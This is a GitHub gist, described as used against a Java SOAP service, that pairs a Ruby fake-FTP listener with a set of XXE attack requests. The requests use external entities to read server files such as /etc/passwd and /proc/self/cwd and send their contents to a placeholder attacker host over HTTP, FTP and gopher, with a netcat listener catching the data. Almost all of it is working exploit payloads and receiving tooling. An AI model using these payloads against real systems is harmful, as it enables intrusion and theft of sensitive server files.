Last active
November 22, 2016 14:51
-
-
Save 73696e65/fa9f7852f6ac8673b92768b4172cbf67 to your computer and use it in GitHub Desktop.
Used against Java Soap Service
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'socket' | |
port = ARGV[0] || 31337 | |
server = TCPServer.new port | |
puts "Listening on the port: #{port}" | |
loop do | |
Thread.start(server.accept) do |client| | |
puts "Client connected" | |
data = "" | |
client.puts("220 xxe-ftp-server") | |
loop do | |
req = client.gets() | |
puts "< " + req | |
if req.include? "USER" | |
client.puts("331 password please - version check") | |
else | |
client.puts("230 more data please!") | |
end | |
end | |
end | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
XXE, where the text is reflected in the response | |
-------------------------------------------------------------- | |
POST /service/ss HTTP/1.1 | |
Content-Type: text/xml | |
Connection: close | |
<!DOCTYPE r [ | |
<!ENTITY % start "<![CDATA["> | |
<!ENTITY % body SYSTEM "file:///etc/test.xml"> | |
<!ENTITY % end "]]>"> | |
<!ENTITY % dtd SYSTEM "http://x.x.x.x:y/a.dtd"> | |
%dtd; | |
]> | |
... | |
<legitimate>&all;</legitimate> | |
-------------------------------------------------------------- | |
a.dtd: | |
<!ENTITY all "%start;%body;%end;"> | |
-------------------------------------------------------------- | |
-------------------------------------------------------------- | |
XXE Locator, making remote connection | |
-------------------------------------------------------------- | |
POST /service/ss HTTP/1.1 | |
Content-Type: text/xml | |
Connection: close | |
<!DOCTYPE r [ | |
<!ENTITY connect SYSTEM "http://x.x.x.x:y/test"> | |
]> | |
<r>&connect;</r> | |
-------------------------------------------------------------- | |
-------------------------------------------------------------- | |
XXE Blind Payload, without proper URL encoding | |
-------------------------------------------------------------- | |
POST /service/ss HTTP/1.1 | |
Content-Type: text/xml | |
Connection: close | |
<!DOCTYPE r [ | |
<!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd"> | |
%connect; | |
%param1; | |
]> | |
<r>&send;</r> | |
-------------------------------------------------------------- | |
a.dtd: | |
<!ENTITY % data SYSTEM "file:///etc/system-release"> | |
<!ENTITY % param1 "<!ENTITY send SYSTEM 'http://x.x.x.x:y/?%data;'>"> | |
-------------------------------------------------------------- | |
-------------------------------------------------------------- | |
XXE Blind Payload, extraction with FTP | |
-------------------------------------------------------------- | |
POST /service/ss HTTP/1.1 | |
Content-Type: text/xml | |
Connection: close | |
<!DOCTYPE r [ | |
<!ENTITY % data SYSTEM "file:///etc/passwd"> | |
<!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd"> | |
%connect; | |
%param1; | |
%send; | |
]> | |
-------------------------------------------------------------- | |
a.dtd: | |
<!ENTITY % param1 "<!ENTITY % send SYSTEM 'ftp://x.x.x.x:y/%data;'>"> | |
-------------------------------------------------------------- | |
-------------------------------------------------------------- | |
XXE Blind Payload, extraction with gopher (using socket on port z) | |
-------------------------------------------------------------- | |
POST /service/ss HTTP/1.1 | |
Content-Type: text/xml | |
Connection: close | |
<!DOCTYPE r [ | |
<!ENTITY % file SYSTEM "file:///proc/self/cwd"> | |
<!ENTITY % dtd SYSTEM "http://x.x.x.x:y/a.dtd"> | |
%dtd;]> | |
<r>&send;</r> | |
-------------------------------------------------------------- | |
a.dtd: | |
<!ENTITY % yy "<!ENTITY send SYSTEM 'gopher://x.x.x.x:z/?%file;'>"> | |
%yy; | |
-------------------------------------------------------------- | |
$ nc -lvnp z | |
-------------------------------------------------------------- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment